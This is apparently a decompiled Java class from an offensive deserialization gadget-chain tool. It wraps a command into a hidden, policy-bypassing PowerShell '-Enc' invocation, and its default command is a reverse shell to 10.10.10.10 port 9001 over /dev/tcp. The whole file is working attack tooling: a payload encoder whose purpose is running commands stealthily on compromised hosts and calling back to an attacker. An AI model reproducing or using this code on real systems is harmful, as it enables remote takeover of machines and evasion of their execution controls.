package com.ar3h.chains.gadget.impl.common.other;

import com.ar3h.chains.common.Gadget;
import com.ar3h.chains.common.GadgetChain;
import com.ar3h.chains.common.GadgetContext;
import com.ar3h.chains.common.Tag;
import com.ar3h.chains.common.annotations.GadgetAnnotation;
import com.ar3h.chains.common.annotations.GadgetTags;
import com.ar3h.chains.common.param.Param;
import java.nio.charset.StandardCharsets;
import java.util.ArrayList;
import java.util.Base64;

@GadgetAnnotation(name = "Java Powershell 执行命令处理", description = "处理 Runtime Exec 执行某些命令的问题")
@GadgetTags(tags = {Tag.Other, Tag.END})
/* loaded from: input_file:BOOT-INF/lib/chains-core-1.4.1.jar:com/ar3h/chains/gadget/impl/common/other/JavaRunCmdPs.class */
public class JavaRunCmdPs implements Gadget {

    @Param(name = "命令", description = "执行命令内容", requires = true)
    public String cmd = "sh -i >& /dev/tcp/10.10.10.10/9001 0>&1";

    public static String getPowershellCommand(String str) {
        char[] charArray = str.toCharArray();
        ArrayList arrayList = new ArrayList();
        for (char c : charArray) {
            for (byte b : String.valueOf(c).getBytes(StandardCharsets.UTF_8)) {
                arrayList.add(Byte.valueOf(b));
            }
            arrayList.add((byte) 0);
        }
        byte[] bArr = new byte[arrayList.size()];
        for (int i = 0; i < arrayList.size(); i++) {
            bArr[i] = ((Byte) arrayList.get(i)).byteValue();
        }
        return "powershell.exe -NonI -W Hidden -NoP -Exec Bypass -Enc " + Base64.getEncoder().encodeToString(bArr);
    }

    @Override // com.ar3h.chains.common.Gadget
    public Object invoke(GadgetContext gadgetContext, GadgetChain gadgetChain) throws Exception {
        return getPowershellCommand(this.cmd);
    }
}
